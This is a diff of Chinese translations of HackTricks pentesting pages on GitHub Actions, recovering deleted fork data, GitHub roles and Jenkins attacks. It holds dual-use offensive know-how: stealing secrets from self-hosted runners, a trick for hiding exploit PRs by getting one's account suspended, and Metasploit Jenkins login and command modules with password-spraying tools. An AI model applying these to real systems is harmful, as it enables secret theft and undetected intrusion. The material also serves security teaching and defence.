[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte).png)
.png)
.png)
.png)
@@ -468,7 +468,7 @@ key: ${{ secrets.PUBLISH_KEY }}
查找**在非 GitHub 基础设施中执行的 GitHub Actions**的方法是搜索 GitHub Action 配置 yaml 中的**`runs-on: self-hosted`**。
-**自托管**运行器可能访问**额外的敏感信息**,访问其他**网络系统**(网络中的脆弱端点?元数据服务?)或者,即使它是隔离和销毁的,**可能会同时运行多个操作**,恶意操作可能会**窃取其他操作的秘密**。
+**自托管**运行器可能访问**额外敏感信息**,访问其他**网络系统**(网络中的脆弱端点?元数据服务?)或者,即使它是隔离和销毁的,**可能会同时运行多个操作**,恶意操作可能会**窃取其他操作的秘密**。
在自托管运行器中,还可以通过转储其内存来获取**来自 \_Runner.Listener**\_\*\* 进程\*\* 的**秘密**,该进程将在任何步骤中包含工作流的所有秘密:
```bash
@@ -517,7 +517,7 @@ ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ e
正如您在之前的代码中看到的,Github 注册表托管在 **`ghcr.io`**。
-具有对该仓库的读取权限的用户将能够使用个人访问令牌下载 Docker 镜像:
+具有对仓库的读取权限的用户将能够使用个人访问令牌下载 Docker 镜像:
```bash
echo $gh_token | docker login ghcr.io -u --password-stdin
docker pull ghcr.io//:
@@ -530,13 +530,13 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m
### Github Actions 日志中的敏感信息
-即使 **Github** 尝试 **检测日志中的秘密值** 并 **避免显示** 它们,**其他敏感数据** 在执行操作时生成的内容仍然不会被隐藏。例如,使用秘密值签名的 JWT 除非 [特别配置](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret),否则不会被隐藏。
+即使 **Github** 尝试 **检测秘密值** 在操作日志中并 **避免显示** 它们,**其他敏感数据** 在操作执行过程中生成的也不会被隐藏。例如,使用秘密值签名的 JWT 除非 [特别配置](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret),否则不会被隐藏。
## 掩盖你的痕迹
-(技术来自 [**这里**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit))首先,任何提出的 PR 在 Github 上对公众和目标 GitHub 账户都是明显可见的。在 GitHub 中,默认情况下,我们 **无法删除互联网上的 PR**,但有一个变数。对于被 Github **暂停** 的 GitHub 账户,所有的 **PR 会被自动删除** 并从互联网上移除。因此,为了隐藏你的活动,你需要让你的 **GitHub 账户被暂停或被标记**。这将 **隐藏你在 GitHub 上的所有活动**(基本上移除你所有的利用 PR)
+(来自 [**这里**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit) 的技术)首先,任何提出的 PR 在 Github 上对公众和目标 GitHub 账户都是明显可见的。在 GitHub 中,默认情况下,我们 **无法删除互联网上的 PR**,但有一个变数。对于被 Github **暂停** 的 GitHub 账户,所有的 **PR 会被自动删除** 并从互联网上移除。因此,为了隐藏你的活动,你需要让你的 **GitHub 账户被暂停或被标记**。这将 **隐藏你在 GitHub 上的所有活动**(基本上移除你所有的利用 PR)
-GitHub 中的一个组织非常积极地向 GitHub 举报账户。你所需要做的就是在 Issue 中分享“某些东西”,他们会确保你的账户在 12 小时内被暂停 :p 这样,你的利用在 GitHub 上就变得不可见了。
+GitHub 中的一个组织非常积极地向 GitHub 举报账户。你所需要做的就是在 Issue 中分享“某些东西”,他们会确保你的账户在 12 小时内被暂停 :p 这样你就可以让你的利用在 GitHub 上变得不可见。
> [!WARNING]
> 组织发现自己被针对的唯一方法是通过 SIEM 检查 GitHub 日志,因为从 GitHub UI 中 PR 会被移除。
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
index 59da712ac..1dde2536f 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1 +1 @@
-# Gh Actions - Artifact Poisoning
+# Gh Actions - 伪造工件
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
index 699952c62..3102ed544 100644
--- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -1,46 +1,46 @@
-# Accessible Deleted Data in Github
+# 在Github中访问已删除的数据
{{#include ../../banners/hacktricks-training.md}}
-这种访问被认为已删除的Github数据的方法在[**这篇博客文章中报告**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)。
+访问据称已删除的Github数据的方法在[**这篇博客文章中报告**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)。
-## Accessing Deleted Fork Data
+## 访问已删除的Fork数据
-1. 你fork一个公共仓库
-2. 你向你的fork提交代码
-3. 你删除你的fork
+1. 你Fork一个公共仓库
+2. 你向你的Fork提交代码
+3. 你删除你的Fork
> [!CAUTION]
-> 在已删除的fork中提交的数据仍然可以访问。
+> 在已删除的Fork中提交的数据仍然可以访问。
-## Accessing Deleted Repo Data
+## 访问已删除的仓库数据
1. 你在GitHub上有一个公共仓库。
-2. 一个用户fork了你的仓库。
-3. 你在他们fork之后提交数据(而他们从未将他们的fork与您的更新同步)。
+2. 一个用户Fork了你的仓库。
+3. 你在他们Fork之后提交数据(而他们从未将他们的Fork与您的更新同步)。
4. 你删除整个仓库。
> [!CAUTION]
-> 即使你删除了你的仓库,对其所做的所有更改仍然可以通过fork访问。
+> 即使你删除了你的仓库,所有对其所做的更改仍然可以通过Fork访问。
-## Accessing Private Repo Data
+## 访问私有仓库数据
1. 你创建一个最终会公开的私有仓库。
-2. 你创建该仓库的私有内部版本(通过fork)并提交额外的代码用于你不打算公开的功能。
-3. 你将你的“上游”仓库设为公开,并保持你的fork为私有。
+2. 你创建该仓库的私有内部版本(通过Fork)并提交额外的代码以实现你不打算公开的功能。
+3. 你将你的“上游”仓库设为公共,并保持你的Fork为私有。
> [!CAUTION]
-> 在内部fork创建和公共版本公开之间的时间内,可以访问推送到内部fork的所有数据。
+> 在内部Fork创建和公共版本公开之间的时间内,可以访问推送到内部Fork的所有数据。
-## How to discover commits from deleted/hidden forks
+## 如何发现已删除/隐藏Fork的提交
-同一篇博客文章提出了两个选项:
+同一篇博客文章提出了2个选项:
-### Directly accessing the commit
+### 直接访问提交
如果已知提交ID(sha-1)值,可以在`https://github.com///commit/`中访问它。
-### Brute-forcing short SHA-1 values
+### 暴力破解短SHA-1值
访问这两者是相同的:
@@ -49,7 +49,7 @@
而最新的一个使用了一个可以暴力破解的短sha-1。
-## References
+## 参考
- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
index bfeafcf88..5ffceb125 100644
--- a/src/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -4,9 +4,9 @@
## 基本结构
-大型 **公司** 的基本 github 环境结构是拥有一个 **企业**,该企业拥有 **多个组织**,每个组织可能包含 **多个代码库** 和 **多个团队**。较小的公司可能只 **拥有一个组织而没有企业**。
+一个大 **公司** 的基本 github 环境结构是拥有一个 **企业**,该企业拥有 **多个组织**,每个组织可能包含 **多个代码库** 和 **多个团队**。较小的公司可能只 **拥有一个组织而没有企业**。
-从用户的角度来看,**用户** 可以是 **不同企业和组织的成员**。在这些组织中,用户可能拥有 **不同的企业、组织和代码库角色**。
+从用户的角度来看,一个 **用户** 可以是 **不同企业和组织的成员**。在这些组织中,用户可能拥有 **不同的企业、组织和代码库角色**。
此外,用户可能是 **不同团队的一部分**,并拥有不同的企业、组织或代码库角色。
@@ -16,20 +16,20 @@
### 企业角色
-- **企业所有者**:拥有此角色的人可以 **管理管理员、管理企业内的组织、管理企业设置、在组织间强制执行政策**。但是,他们 **无法访问组织设置或内容**,除非他们被指定为组织所有者或获得对组织拥有的代码库的直接访问权限。
-- **企业成员**:由您的企业拥有的组织的成员也 **自动成为企业成员**。
+- **企业所有者**:拥有此角色的人可以 **管理管理员、管理企业内的组织、管理企业设置、在组织间强制执行政策**。然而,他们 **无法访问组织设置或内容**,除非他们被指定为组织所有者或获得对组织拥有的代码库的直接访问权限。
+- **企业成员**:由您的企业拥有的组织的成员也是 **自动成为企业成员**。
### 组织角色
在组织中,用户可以拥有不同的角色:
-- **组织所有者**:组织所有者对您的组织拥有 **完全的管理访问权限**。此角色应限制,但不应少于两人。
-- **组织成员**:在 **组织中的人** 的默认非管理角色是组织成员。默认情况下,组织成员 **拥有一定数量的权限**。
-- **账单管理员**:账单管理员是可以 **管理您组织的账单设置** 的用户,例如支付信息。
-- **安全管理员**:这是组织所有者可以分配给组织中任何团队的角色。应用后,它赋予团队的每个成员权限,以 **管理组织内的安全警报和设置,以及对所有代码库的读取权限**。
-- 如果您的组织有安全团队,您可以使用安全管理员角色为团队成员提供他们所需的最低访问权限。
-- **Github 应用管理员**:为了允许其他用户 **管理组织拥有的 GitHub 应用**,所有者可以授予他们 GitHub 应用管理员权限。
-- **外部协作者**:外部协作者是指 **可以访问一个或多个组织代码库但不是组织的明确成员** 的人。
+- **组织所有者**:组织所有者拥有 **对组织的完全管理访问权限**。此角色应限制,但不少于两人。
+- **组织成员**:组织中的 **默认** 非管理角色是组织成员。默认情况下,组织成员 **拥有一定数量的权限**。
+- **账单经理**:账单经理是可以 **管理组织的账单设置** 的用户,例如支付信息。
+- **安全经理**:这是组织所有者可以分配给组织中任何团队的角色。应用后,它赋予团队的每个成员权限,以 **管理组织内的安全警报和设置,以及对所有代码库的读取权限**。
+- 如果您的组织有安全团队,您可以使用安全经理角色为团队成员提供他们所需的最低访问权限。
+- **Github 应用程序经理**:为了允许其他用户 **管理组织拥有的 GitHub 应用程序**,所有者可以授予他们 GitHub 应用程序经理权限。
+- **外部合作者**:外部合作者是指 **访问一个或多个组织代码库但不是组织的明确成员** 的人。
您可以在此表中 **比较这些角色的权限**:[https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
@@ -39,10 +39,10 @@
此处配置的设置将指示组织成员的以下权限:
-- 对所有组织代码库拥有管理员、写入、读取或无权限。
+- 对所有组织代码库的管理员、写入、读取或无权限。
- 成员是否可以创建私有、内部或公共代码库。
- 是否可以对代码库进行分叉。
-- 是否可以邀请外部协作者。
+- 是否可以邀请外部合作者。
- 是否可以发布公共或私有网站。
- 管理员对代码库的权限。
- 成员是否可以创建新团队。
@@ -55,7 +55,7 @@
- **分类**:推荐给 **需要主动管理问题和拉取请求的贡献者**,但没有写入权限。
- **写入**:推荐给 **积极推送到您的项目的贡献者**。
- **维护**:推荐给 **需要管理代码库的项目经理**,但不需要访问敏感或破坏性操作。
-- **管理员**:推荐给需要 **对项目拥有完全访问权限** 的人,包括管理安全或删除代码库等敏感和破坏性操作。
+- **管理员**:推荐给需要 **对项目的完全访问权限** 的人,包括管理安全或删除代码库等敏感和破坏性操作。
您可以在此表中 **比较每个角色的权限**:[https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
@@ -69,7 +69,7 @@
组织的用户可以在 _https://github.com/orgs/\/people_ 中 **列出**。
-在每个用户的信息中,您可以看到 **用户是哪个团队的成员**,以及 **用户可以访问的代码库**。
+在每个用户的信息中,您可以看到 **用户是哪些团队的成员**,以及 **用户可以访问哪些代码库**。
## Github 认证
@@ -85,69 +85,69 @@ Github 提供不同的方式来验证您的帐户并代表您执行操作。
#### **GPG 密钥**
-您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **在没有签名的情况下发送提交时被发现**。了解更多关于 [警惕模式的信息](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode)。
+您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **被发现发送未签名的提交**。了解更多关于 [警惕模式的信息](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode)。
### **个人访问令牌**
-您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。创建个人访问令牌时,**用户** 需要 **指定** 令牌将拥有的 **权限**。[https://github.com/settings/tokens](https://github.com/settings/tokens)
+您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。创建个人访问令牌时,**用户**需要 **指定** 令牌将拥有的 **权限**。[https://github.com/settings/tokens](https://github.com/settings/tokens)
-### Oauth 应用
+### Oauth 应用程序
-Oauth 应用可能会请求您 **访问部分 GitHub 信息或冒充您** 执行某些操作。此功能的一个常见示例是您可能在某些平台上找到的 **使用 GitHub 登录按钮**。
+Oauth 应用程序可能会请求您 **访问部分 GitHub 信息或冒充您** 执行某些操作。此功能的一个常见示例是您可能在某些平台上找到的 **使用 GitHub 登录按钮**。
-- 您可以在 [https://github.com/settings/developers](https://github.com/settings/developers) 中 **创建** 您自己的 **Oauth 应用**。
-- 您可以在 [https://github.com/settings/applications](https://github.com/settings/applications) 中查看所有 **访问您帐户的 Oauth 应用**。
-- 您可以在 [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) 中查看 **Oauth 应用可以请求的范围**。
-- 您可以在 _https://github.com/organizations/\/settings/oauth_application_policy_ 中查看组织中应用程序的第三方访问。
+- 您可以在 [https://github.com/settings/developers](https://github.com/settings/developers) 中 **创建** 您自己的 **Oauth 应用程序**。
+- 您可以在 [https://github.com/settings/applications](https://github.com/settings/applications) 中查看所有 **访问您帐户的 Oauth 应用程序**。
+- 您可以在 [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) 中查看 **Oauth 应用程序可以请求的范围**。
+- 您可以在 _https://github.com/organizations/\/settings/oauth_application_policy_ 中查看 **组织中应用程序的第三方访问**。
一些 **安全建议**:
-- **OAuth 应用** 应始终 **作为经过身份验证的 GitHub 用户在 GitHub 的所有地方操作**(例如,在提供用户通知时),并仅访问指定的范围。
-- OAuth 应用可以通过为经过身份验证的用户启用“使用 GitHub 登录”作为身份提供者。
-- **不要** 构建一个 **OAuth 应用**,如果您希望您的应用程序在 **单个代码库** 上操作。使用 `repo` OAuth 范围,OAuth 应用可以 **在所有**\*\* 经过身份验证的用户的代码库上操作\*\*。
-- **不要** 构建一个 OAuth 应用来作为您 **团队或公司的** 应用程序。OAuth 应用作为 **单个用户** 进行身份验证,因此如果一个人创建了一个供公司使用的 OAuth 应用,然后他们离开公司,其他人将无法访问它。
+- **OAuth 应用程序** 应始终 **在 GitHub 的所有地方作为经过身份验证的 GitHub 用户操作**(例如,在提供用户通知时),并仅访问指定的范围。
+- OAuth 应用程序可以通过为经过身份验证的用户启用“使用 GitHub 登录”作为身份提供者。
+- **不要** 构建 **OAuth 应用程序**,如果您希望您的应用程序在 **单个代码库** 上操作。使用 `repo` OAuth 范围,OAuth 应用程序可以 **在所有** 经过身份验证的用户的代码库上操作。
+- **不要** 构建 OAuth 应用程序以作为您 **团队或公司的** 应用程序。OAuth 应用程序作为 **单个用户** 进行身份验证,因此如果一个人创建了一个供公司使用的 OAuth 应用程序,然后他们离开公司,其他人将无法访问它。
- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps)。
-### Github 应用
+### Github 应用程序
-Github 应用可以请求权限以 **访问您的 GitHub 信息或冒充您** 执行特定操作。在 Github 应用中,您需要指定应用将访问的代码库。
+Github 应用程序可以请求权限以 **访问您的 GitHub 信息或冒充您** 执行特定操作。在 Github 应用程序中,您需要指定应用程序将访问的代码库。
-- 要安装 GitHub 应用,您必须是 **组织所有者或在代码库中拥有管理员权限**。
-- GitHub 应用应 **连接到个人帐户或组织**。
-- 您可以在 [https://github.com/settings/apps](https://github.com/settings/apps) 中创建自己的 GitHub 应用。
-- 您可以在 [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) 中查看所有 **访问您帐户的 GitHub 应用**。
-- 这些是 **GitHub 应用的 API 端点** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)。根据应用的权限,它将能够访问其中的一些。
-- 您可以在 _https://github.com/organizations/\/settings/installations_ 中查看组织中的已安装应用。
+- 要安装 GitHub 应用程序,您必须是 **组织所有者或在代码库中拥有管理员权限**。
+- GitHub 应用程序应 **连接到个人帐户或组织**。
+- 您可以在 [https://github.com/settings/apps](https://github.com/settings/apps) 中创建自己的 Github 应用程序。
+- 您可以在 [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) 中查看所有 **访问您帐户的 Github 应用程序**。
+- 这些是 **Github 应用程序的 API 端点** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)。根据应用程序的权限,它将能够访问其中的一些。
+- 您可以在 _https://github.com/organizations/\/settings/installations_ 中查看组织中的已安装应用程序。
一些安全建议:
-- GitHub 应用应 **独立于用户采取行动**(除非应用使用 [用户到服务器](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) 令牌)。为了使用户到服务器的访问令牌更安全,您可以使用将在 8 小时后过期的访问令牌,以及可以交换为新访问令牌的刷新令牌。有关更多信息,请参见“[刷新用户到服务器的访问令牌](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)”。
-- 确保 GitHub 应用与 **特定代码库** 集成。
-- GitHub 应用应 **连接到个人帐户或组织**。
-- 不要期望 GitHub 应用知道并做用户可以做的所有事情。
-- **如果您只需要“使用 GitHub 登录”服务,请不要使用 GitHub 应用**。但是,GitHub 应用可以使用 [用户识别流程](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) 来登录用户 _并_ 执行其他操作。
-- 如果您使用应用与 GitHub Actions,并希望修改工作流文件,您必须代表用户使用包含 `workflow` 范围的 OAuth 令牌进行身份验证。用户必须对包含工作流文件的代码库具有管理员或写入权限。有关更多信息,请参见“[了解 OAuth 应用的范围](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)”。
+- GitHub 应用程序应 **独立于用户采取行动**(除非应用程序使用 [用户到服务器](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) 令牌)。为了使用户到服务器的访问令牌更安全,您可以使用将在 8 小时后过期的访问令牌,以及可以交换为新访问令牌的刷新令牌。有关更多信息,请参见“[刷新用户到服务器的访问令牌](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)”。
+- 确保 GitHub 应用程序与 **特定代码库** 集成。
+- GitHub 应用程序应 **连接到个人帐户或组织**。
+- 不要期望 GitHub 应用程序知道并执行用户可以做的所有事情。
+- **如果您只需要“使用 GitHub 登录”服务,请不要使用 GitHub 应用程序**。但是,GitHub 应用程序可以使用 [用户身份识别流程](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) 来登录用户 _并_ 执行其他操作。
+- 如果您在使用 GitHub Actions 的应用程序中希望修改工作流文件,您必须代表用户使用包含 `workflow` 范围的 OAuth 令牌进行身份验证。用户必须对包含工作流文件的代码库具有管理员或写入权限。有关更多信息,请参见“[理解 OAuth 应用程序的范围](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)”。
- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps)。
### Github Actions
-这 **不是在 GitHub 中进行身份验证的方法**,但一个 **恶意** 的 GitHub Action 可能会获得 **未经授权的访问 GitHub**,并且 **根据** 赋予 Action 的 **权限**,可能会进行几种 **不同的攻击**。有关更多信息,请参见下文。
+这 **不是在 github 中进行身份验证的方法**,但一个 **恶意的** Github Action 可能会获得 **未经授权的访问**,并且 **根据** 赋予 Action 的 **权限**,可能会进行几种 **不同的攻击**。有关更多信息,请参见下文。
## Git 操作
-Git 操作允许在事件发生时自动化 **代码的执行**。通常执行的代码与 **代码库的代码有某种关系**(可能构建一个 docker 容器或检查 PR 是否包含秘密)。
+Git 操作允许在 **事件发生时自动执行代码**。通常执行的代码与 **代码库的代码有某种关系**(可能构建一个 docker 容器或检查 PR 是否包含秘密)。
### 配置
-在 _https://github.com/organizations/\/settings/actions_ 中,可以检查组织的 **GitHub Actions 配置**。
+在 _https://github.com/organizations/\/settings/actions_ 中,可以检查组织的 **github actions 配置**。
-可以完全禁止使用 GitHub Actions,**允许所有 GitHub Actions**,或仅允许某些操作。
+可以完全禁止使用 github actions,**允许所有 github actions**,或仅允许某些操作。
-还可以配置 **谁需要批准才能运行 GitHub Action** 以及运行时 GitHub Action 的 **GITHUB_TOKEN 权限**。
+还可以配置 **谁需要批准才能运行 Github Action** 以及运行时 Github Action 的 **GITHUB_TOKEN 权限**。
### Git 秘密
-GitHub Action 通常需要某种秘密与 GitHub 或第三方应用程序进行交互。为了 **避免将它们以明文形式放入代码库**,GitHub 允许将它们作为 **秘密** 放置。
+Github Action 通常需要某种秘密与 github 或第三方应用程序进行交互。为了 **避免将其以明文形式放入代码库**,github 允许将其作为 **Secrets** 放置。
这些秘密可以为 **代码库或整个组织** 配置。然后,为了使 **Action 能够访问秘密**,您需要将其声明为:
```yaml
@@ -167,15 +167,15 @@ run: |
example-command "$SUPER_SECRET"
```
> [!WARNING]
-> Secrets **只能通过声明它们的 Github Actions 访问**。
+> 秘密 **只能通过声明它们的 Github Actions 访问**。
-> 一旦在仓库或组织中配置,**github 用户将无法再次访问它们**,他们只能**更改它们**。
+> 一旦在仓库或组织中配置,**github 的用户将无法再次访问它们**,他们只能 **更改它们**。
-因此,**窃取 github secrets 的唯一方法是能够访问执行 Github Action 的机器**(在这种情况下,您将只能访问为该 Action 声明的 secrets)。
+因此,**窃取 github 秘密的唯一方法是能够访问执行 Github Action 的机器**(在这种情况下,您将只能访问为该 Action 声明的秘密)。
### Git 环境
-Github 允许创建 **环境**,您可以在其中保存 **secrets**。然后,您可以通过类似以下方式授予 github action 访问环境中的 secrets:
+Github 允许创建 **环境**,您可以在其中保存 **秘密**。然后,您可以通过类似以下方式授予 github action 访问环境内的秘密:
```yaml
jobs:
deployment:
@@ -183,21 +183,21 @@ runs-on: ubuntu-latest
environment: env_name
```
您可以配置一个环境以**被所有分支访问**(默认),**仅受保护的**分支或**指定**可以访问它的分支。\
-它还可以设置**执行**某个**操作**之前所需的**审核数量**,或者**等待**一段**时间**再允许部署继续。
+它还可以在**执行**使用**环境**的**操作**之前设置**所需的审查数量**或**等待**一段**时间**再允许部署继续。
### Git Action Runner
-Github Action可以**在github环境中执行**,也可以在用户配置的**第三方基础设施**中执行。
+Github Action可以**在github环境内执行**,也可以在用户配置的**第三方基础设施**中执行。
一些组织将允许在**第三方基础设施**中运行Github Actions,因为这通常是**更便宜**的。
-您可以在 _https://github.com/organizations/\/settings/actions/runners_ 列出组织的自托管运行器。
+您可以在 _https://github.com/organizations/\/settings/actions/runners_ 列出一个组织的自托管运行器。
查找**在非github基础设施中执行的Github Actions**的方法是搜索Github Action配置yaml中的 `runs-on: self-hosted`。
-**不可能在不同组织的自托管环境中运行组织的Github Action**,因为**在配置Runner时会生成一个唯一的令牌**以知道该Runner属于哪里。
+**不可能在不同组织的自托管环境中运行一个组织的Github Action**,因为**在配置Runner时生成了一个唯一的令牌**以知道该Runner属于哪里。
-如果自定义**Github Runner配置在AWS或GCP内部的机器上**,例如,该Action**可能会访问元数据端点**并**窃取服务帐户的令牌**,该机器正在运行。
+如果自定义**Github Runner配置在AWS或GCP内部的机器上**,例如,该Action**可能访问元数据端点**并**窃取服务账户的令牌**,该机器正在运行。
### Git Action Compromise
@@ -207,27 +207,27 @@ Github Action可以**在github环境中执行**,也可以在用户配置的**
> 一个**恶意的Github Action**运行可能会被攻击者**滥用**:
>
> - **窃取所有秘密**,该Action可以访问
-> - **横向移动**,如果该Action在**第三方基础设施**中执行,可以访问用于运行机器的SA令牌(可能通过元数据服务)
+> - **横向移动**,如果该Action在可以访问用于运行机器的SA令牌的**第三方基础设施**中执行(可能通过元数据服务)
> - **滥用工作流**使用的令牌,以**窃取执行该Action的repo的代码**或**甚至修改它**。
## Branch Protections
-分支保护旨在**不将完整控制权授予用户**。目标是**在能够在某个分支中编写代码之前设置多个保护方法**。
+分支保护旨在**不将完整控制权授予用户**。目标是**在能够在某个分支中编写代码之前设置几种保护方法**。
**一个仓库的分支保护**可以在 _https://github.com/\/\/settings/branches_ 找到。
> [!NOTE]
> **不可能在组织级别设置分支保护**。因此,所有保护必须在每个repo中声明。
-可以对分支应用不同的保护(例如对master):
+可以对分支(如master)应用不同的保护:
-- 您可以**要求在合并之前进行PR**(因此您不能直接在分支上合并代码)。如果选择此项,则可以实施其他不同的保护:
+- 您可以**要求在合并之前进行PR**(因此您不能直接将代码合并到该分支)。如果选择此项,则可以实施其他不同的保护:
- **要求一定数量的批准**。通常需要1或2个以上的人批准您的PR,以便单个用户无法直接合并代码。
- **在推送新提交时撤销批准**。否则,用户可能会批准合法代码,然后用户可以添加恶意代码并合并。
-- **要求代码所有者进行审核**。至少需要1个代码所有者批准PR(因此“随机”用户无法批准)。
-- **限制谁可以撤销拉取请求审核**。您可以指定允许撤销拉取请求审核的人员或团队。
+- **要求代码所有者的审查**。至少需要1个代码所有者批准PR(因此“随机”用户无法批准)。
+- **限制谁可以撤销拉取请求审查**。您可以指定允许撤销拉取请求审查的人或团队。
- **允许指定的参与者绕过拉取请求要求**。这些用户将能够绕过先前的限制。
-- **要求状态检查在合并之前通过**。某些检查需要在能够合并提交之前通过(例如,检查没有明文秘密的github action)。
+- **要求状态检查在合并之前通过**。在能够合并提交之前,需要通过某些检查(例如,检查没有明文秘密的github action)。
- **要求在合并之前解决对话**。所有代码上的评论需要在PR合并之前解决。
- **要求签名提交**。提交需要签名。
- **要求线性历史**。防止将合并提交推送到匹配的分支。
diff --git a/src/pentesting-ci-cd/jenkins-security/README.md b/src/pentesting-ci-cd/jenkins-security/README.md
index 0145b1df9..4a2315626 100644
--- a/src/pentesting-ci-cd/jenkins-security/README.md
+++ b/src/pentesting-ci-cd/jenkins-security/README.md
@@ -1,10 +1,10 @@
-# Jenkins Security
+# Jenkins 安全
{{#include ../../banners/hacktricks-training.md}}
## 基本信息
-Jenkins 是一个工具,提供了一种简单的方法来建立几乎 **任何** 编程语言和源代码库组合的 **持续集成** 或 **持续交付** (CI/CD) 环境,使用管道。此外,它还自动化了各种常规开发任务。虽然 Jenkins 并不消除 **为单个步骤创建脚本的需要**,但它确实提供了一种比手动构建更快、更强大的方式来集成整个构建、测试和部署工具的序列。
+Jenkins 是一个工具,提供了一种简单的方法来建立几乎任何编程语言和源代码库组合的 **持续集成** 或 **持续交付** (CI/CD) 环境,使用管道。此外,它还自动化了各种常规开发任务。虽然 Jenkins 并没有消除 **为单个步骤创建脚本的需要**,但它确实提供了一种比手动构建更快、更强大的方式来集成整个构建、测试和部署工具的序列。
{{#ref}}
basic-jenkins-information.md
@@ -24,8 +24,6 @@ msf> use auxiliary/scanner/http/jenkins_command
您可能能够从路径 _**/oops**_ 或 _**/error**_ 获取 Jenkins 版本。
-.png>)
-
### 已知漏洞
{{#ref}}
@@ -46,7 +44,7 @@ basic-jenkins-information.md
### **SSO 登录**
-如果存在 **SSO** **功能**/**插件**,那么您应该尝试使用测试帐户(即测试 **Github/Bitbucket 帐户**)登录应用程序。从 [**这里**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/) 获取技巧。
+如果存在 **SSO** **功能**/**插件**,那么您应该尝试使用测试帐户(即测试 **Github/Bitbucket 帐户**)登录应用程序。技巧来自 [**这里**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/)。
### 暴力破解
@@ -54,24 +52,24 @@ basic-jenkins-information.md
```
msf> use auxiliary/scanner/http/jenkins_login
```
-### 密码喷洒
+### 密码喷射
-使用 [这个 python 脚本](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) 或 [这个 powershell 脚本](https://github.com/chryzsh/JenkinsPasswordSpray)。
+使用 [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) 或 [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray)。
### IP 白名单绕过
-许多组织将 **基于 SaaS 的源代码管理 (SCM) 系统**(如 GitHub 或 GitLab)与 **内部自托管的 CI** 解决方案(如 Jenkins 或 TeamCity)结合使用。此设置允许 CI 系统 **接收来自 SaaS 源代码控制供应商的 webhook 事件**,主要用于触发管道作业。
